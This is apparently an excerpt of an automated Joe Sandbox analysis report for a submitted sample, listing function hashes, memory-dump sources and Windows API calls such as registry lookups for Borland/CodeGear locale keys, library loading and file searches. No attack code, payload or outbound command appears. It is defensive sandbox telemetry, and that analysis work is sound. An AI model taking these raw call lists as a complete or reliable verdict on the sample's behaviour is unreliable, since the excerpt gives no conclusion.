                                                                                                                                            • Opcode Fuzzy Hash: 5a9c263ec52d77fd7c2a5088dd199313b2c99a9bdb3e25d913d27fe764585634
                                                                                                                                            • Instruction Fuzzy Hash: 52411633E116188BE714CE69DC847DA7393ABD8324F2ECA35DD64DB2D0DA39AD118684
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f1b80902d110ceede5f195ec5cdbf87f11b811f40e1d7d4f91158dab935acacf
                                                                                                                                            • Instruction ID: 37c28d44b033f60ce290451158399fe48279cdc68937758c4af9a00537bdf016
                                                                                                                                            • Opcode Fuzzy Hash: f1b80902d110ceede5f195ec5cdbf87f11b811f40e1d7d4f91158dab935acacf
                                                                                                                                            • Instruction Fuzzy Hash: 1B310879A41224DBDB198F44D890A7E77B2FFCA310FA9103EC59363651E3349806CB9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 120d3666ea21d114cd2fbdb4ccda52b0d69d82ea12e995be576adb91a3dce03a
                                                                                                                                            • Instruction ID: 1e7e547f9652e669d0394fe7aa9d60720a408d35aec061100a045437908978bb
                                                                                                                                            • Opcode Fuzzy Hash: 120d3666ea21d114cd2fbdb4ccda52b0d69d82ea12e995be576adb91a3dce03a
                                                                                                                                            • Instruction Fuzzy Hash: 0441D472A18B144BD319AD7D8C5036F7693BBC6334F2DCB2DEA768B3D0DA3488414285
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                            • Instruction ID: 3af6d4c4a57ac562b39cc9003050fd45093bbcd7b48334f19fcdb6268b83e20b
                                                                                                                                            • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                            • Instruction Fuzzy Hash: E2518374E01109DFCB08CF88C590AAEBBB2FF88314F248599D815AB355D731AE81DF95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 61d600502da3bf4760d0a0cad169a4d3503154ab88d31cbb88b24c8ace8c8a63
                                                                                                                                            • Instruction ID: 251667e0794af404039a3ffc7b4aef4da540ab5c970185d6604978823fa7c0fc
                                                                                                                                            • Opcode Fuzzy Hash: 61d600502da3bf4760d0a0cad169a4d3503154ab88d31cbb88b24c8ace8c8a63
                                                                                                                                            • Instruction Fuzzy Hash: 9C2137267546014FE74DCA69D9D22EA77D3D7D6224F08E63D92C4C3392D12CC80BA705
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ba3479d63a828d19bc95b48f8854986b8084a3b84ff3b191dacadcae165f704d
                                                                                                                                            • Instruction ID: 3de23c52b89d916cbae10581837e61067463d0275d00f377464cdb090dfaf3c1
                                                                                                                                            • Opcode Fuzzy Hash: ba3479d63a828d19bc95b48f8854986b8084a3b84ff3b191dacadcae165f704d
                                                                                                                                            • Instruction Fuzzy Hash: C421A4346486418FF735CF18D849B7BBBE1FB96324F285829D0D593152C734D846CBAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 825c10835e65c4008ff2a84f49271a420802bd27f303bded629d857c663548f0
                                                                                                                                            • Instruction ID: a7905b7b49ba884c79ba94184163a9ebad80b62723b9271b5de9393a864d91fa
                                                                                                                                            • Opcode Fuzzy Hash: 825c10835e65c4008ff2a84f49271a420802bd27f303bded629d857c663548f0
                                                                                                                                            • Instruction Fuzzy Hash: 3021F478A086C18BD330CB18DC817AEB7E2BBCE300F14996DD5C593685CB708402878A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b9f8852414ef319afdb34f31053f8b03af4044770f5349ba719085875cb4c9dd
                                                                                                                                            • Instruction ID: a369490abb82db78058c2c899eaa96b9fd44f6fee224ae4543adf381b965910f
                                                                                                                                            • Opcode Fuzzy Hash: b9f8852414ef319afdb34f31053f8b03af4044770f5349ba719085875cb4c9dd
                                                                                                                                            • Instruction Fuzzy Hash: E611CE756086009FF326CF54D884EBBB7AABB86314F246929D19183021C735D9898BAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0e3ad3ef89e5ae96c4e8026419461686e5f7a63965637896b7f9e321e1d86ad2
                                                                                                                                            • Instruction ID: b995fc1a06f4638c7e5e40b27c7cec369d804fec9a9a0f81775494221786fecd
                                                                                                                                            • Opcode Fuzzy Hash: 0e3ad3ef89e5ae96c4e8026419461686e5f7a63965637896b7f9e321e1d86ad2
                                                                                                                                            • Instruction Fuzzy Hash: C6110830918320CBD721CB24DC40EA7B7E9F787328F155938D458D3192D320A9198FD9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0506ec55bb1eeabb00de8469fc935753d476aebcff7e72f4d02f84938f7234cf
                                                                                                                                            • Instruction ID: 6bc314b7d2f811aa722a9e9f185a3830fbe2e8900fec4cffed509bea1844635f
                                                                                                                                            • Opcode Fuzzy Hash: 0506ec55bb1eeabb00de8469fc935753d476aebcff7e72f4d02f84938f7234cf
                                                                                                                                            • Instruction Fuzzy Hash: E811E73BB2562147E350DE76ECD465E6752FBC631474A0638FF41D7282C6A2E411C164
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 19e0741ed9c97644068f5c97cc4be2eb41302857e97e0033660ae995ca00ca95
                                                                                                                                            • Instruction ID: 8963eb700b396c4e24fc9c3810486d8864b7899d13f754ed389eb7bf3f30dddf
                                                                                                                                            • Opcode Fuzzy Hash: 19e0741ed9c97644068f5c97cc4be2eb41302857e97e0033660ae995ca00ca95
                                                                                                                                            • Instruction Fuzzy Hash: DF317CB86193808BE734CF14D891BBBB7E2BFD9304F14982DE0CA97290DBB45505CB1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3abd891059b141b24cd798c1e4512bb2b8ef323e6b84dc6fffad9dab0f12943c
                                                                                                                                            • Instruction ID: 2b4ffef3494c018dd8dd31c24cb43d410dc5ede3a737892135622e77108dc95c
                                                                                                                                            • Opcode Fuzzy Hash: 3abd891059b141b24cd798c1e4512bb2b8ef323e6b84dc6fffad9dab0f12943c
                                                                                                                                            • Instruction Fuzzy Hash: 97114935E452249BFB248B58EC41B7D7A72BBC6720FA51129E580B7295DB704850CF8E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2ea99c3175c99b4b9d58dd970fddc09177dc1d4101d414df02a34867b1b3dceb
                                                                                                                                            • Instruction ID: 8867a254b0ce9068c23b1ede79c4b10111c9188afa7c3147854278a51b4a20f3
                                                                                                                                            • Opcode Fuzzy Hash: 2ea99c3175c99b4b9d58dd970fddc09177dc1d4101d414df02a34867b1b3dceb
                                                                                                                                            • Instruction Fuzzy Hash: FC114CB7A041145BD317DF14ED4453A77A2FBC1214F06952CD8C923604D336DD5A878A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 268cc2831dc83cbda8c33c9c06aca7cc4846e01a7a7b5c06cb17db831d3db092
                                                                                                                                            • Instruction ID: 3c5407e9ff831c96518b29465972cda4328eda8904784f85880396b241d49379
                                                                                                                                            • Opcode Fuzzy Hash: 268cc2831dc83cbda8c33c9c06aca7cc4846e01a7a7b5c06cb17db831d3db092
                                                                                                                                            • Instruction Fuzzy Hash: 411126B8B482108BD70A9F18ECF15BB7761FB56304F28B83CD696D3621C7209916CB0D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cdb834b65ea7fca570a4c06b6d624a0e2a726dd685f086b04c11d5a165a245c3
                                                                                                                                            • Instruction ID: b493dff45bad7b79b236db6f0949842ed9a0173ddef2a7e0f996ec33b25709a0
                                                                                                                                            • Opcode Fuzzy Hash: cdb834b65ea7fca570a4c06b6d624a0e2a726dd685f086b04c11d5a165a245c3
                                                                                                                                            • Instruction Fuzzy Hash: E401D274648200DFE3208B1CD980B6BFBA6BBCE324F145929D0C893251CB31E895CB5E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                            • Instruction ID: 1486e2d2cc0b0c6a1b444f61bb1b832ea25096ef628a70f2d6f70a7ee6fed42c
                                                                                                                                            • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                            • Instruction Fuzzy Hash: AD319374E01109DFCB08CF98C590AAEBBB1FF88314F248599D855AB345D735AA81CF95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                            • Instruction ID: 7c0c0d33bff8982ee9721e58526f341513e5c0054f73cdf3deba9c4968ed7847
                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                            • Instruction Fuzzy Hash: 3A11E573E051D40EC3178D3C8840665FFA32A97138F19A799F4B89B2D6D6228D8A8368
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cb6c4ca0e52fa44ff4b01888bd06a5fe12ceb0c8ea8b7b49ef795fe7b77bbdac
                                                                                                                                            • Instruction ID: ae54942040b9f10c9209b918a232bd09b795dca2003efd6f5b3b2129bffd7bd3
                                                                                                                                            • Opcode Fuzzy Hash: cb6c4ca0e52fa44ff4b01888bd06a5fe12ceb0c8ea8b7b49ef795fe7b77bbdac
                                                                                                                                            • Instruction Fuzzy Hash: C901B1F1A0032247E7209E55D8C172FB6A97FE2709F09082DD808473C7DB72E908CAD9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                            • RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 5000C6D7
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 5000C6E4
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 5000C6EA
                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 5000C718
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C76E
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C77E
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C7AE
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C7BE
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 5000C7ED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                                                            • API String ID: 3838733197-345420546
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,50120000,50242008), ref: 5000C3AD
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 5000C3C4
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,?,50120000,50242008), ref: 5000C3F4
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C463
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4AB
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4BE
                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4D4
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4E0
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000), ref: 5000C51C
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 5000C528
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 5000C54B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                                                            • API String ID: 3245196872-3908791685
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C10C
                                                                                                                                              • Part of subcall function 5001C048: FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                                                              • Part of subcall function 5001C048: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                                                              • Part of subcall function 5001C048: @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                                                              • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileTime$Find$System@System@@Sysutils@Unicode$Array$qqrr20Char$qqrx20CloseClose$qqrr19DateErrorFirstFromLastLocalSearchStringStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2742389685-0
                                                                                                                                            APIs
                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 5001D4E5
                                                                                                                                            • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D507
                                                                                                                                            • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D521
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@_llmul$qqrv$DiskFreeSpace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 50643528-0
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 5001BB48
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?), ref: 5001BB53
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,?,?), ref: 5001BB6C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileFirstMove$qqrpxvpviSystem@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1082176048-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(50120000,?,0000020A), ref: 5000C30A
                                                                                                                                            • @System@LoadResourceModule$qqrpbo.RTL120(50120000,?,0000020A), ref: 5000C313
                                                                                                                                              • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                              • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
